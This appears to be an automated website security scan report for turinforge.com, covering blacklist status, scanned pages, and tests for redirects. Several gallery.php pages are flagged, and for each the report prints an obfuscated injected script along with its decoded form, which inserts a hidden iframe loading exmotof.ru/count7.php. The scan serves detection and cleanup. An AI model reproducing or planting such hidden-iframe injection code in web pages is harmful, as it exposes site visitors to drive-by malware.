Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turinforge.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turinforge.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://turinforge.com/ | 200 OK Content-Length: 17813 Content-Type: text/html | clean |
http://turinforge.com/INDEX.HTM | 200 OK Content-Length: 18209 Content-Type: text/html | clean |
http://turinforge.com/tfservices.htm | 200 OK Content-Length: 10965 Content-Type: text/html | clean |
http://turinforge.com/tfhistory.htm | 200 OK Content-Length: 14997 Content-Type: text/html | clean |
http://turinforge.com/tflocation.htm | 200 OK Content-Length: 8928 Content-Type: text/html | clean |
http://turinforge.com/gallery.php | 200 OK Content-Length: 15201 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: exmotof.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i8 ...[1457 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://exmotof.ru/count7.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://exmotof.ru/count7.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... | ||
http://turinforge.com/plogger/slideshow.js | 200 OK Content-Length: 19939 Content-Type: application/javascript | clean |
http://turinforge.com/plogger/themes/default/dynamics.js | 200 OK Content-Length: 2692 Content-Type: application/javascript | clean |
http://turinforge.com/tfcontact.htm | 200 OK Content-Length: 9604 Content-Type: text/html | clean |
http://turinforge.com/tfcost.htm | 200 OK Content-Length: 17755 Content-Type: text/html | clean |
http://turinforge.com/test404page.js | 404 Not Found Content-Length: 3612 Content-Type: text/html | clean |
http://turinforge.com/gallery.php?level=collection&id=3 | 200 OK Content-Length: 17859 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: exmotof.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i8 ...[1457 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://exmotof.ru/count7.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://exmotof.ru/count7.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... | ||
http://turinforge.com/gallery.php?level=album&id=6 | 200 OK Content-Length: 24092 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: exmotof.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i8 ...[1457 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://exmotof.ru/count7.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://exmotof.ru/count7.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... | ||
http://turinforge.com/gallery.php?level=picture&id=177 | 200 OK Content-Length: 16674 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: exmotof.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i8 ...[1457 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://exmotof.ru/count7.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://exmotof.ru/count7.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... | ||
http://turinforge.com/gallery.php?level=picture&id=176 | 200 OK Content-Length: 16674 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: exmotof.ru c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['-31i-31i65i62i-8i0i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i58i71i60i81i-1i1i51i8i53i1i83i-27i-31i-31i-31i65i62i74i57i69i61i74i0i1i19i-27i-31i-31i85i-8i61i68i75i61i-8i83i-27i-31i-31i-31i60i71i59i77i69i61i70i76i6i79i74i65i76i61i0i-6i20i65i62i74i57i69i61i-8i75i74i59i21i-1i64i76i76i72i18i7i7i61i8 ...[1457 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://exmotof.ru/count7.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://exmotof.ru/count7.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: turinforge.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:00:43 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: turinforge.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:00:43 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: turinforge.com
Referer: http://www.google.com/search?q=turinforge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: turinforge.com
Referer: http://www.google.com/search?q=turinforge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.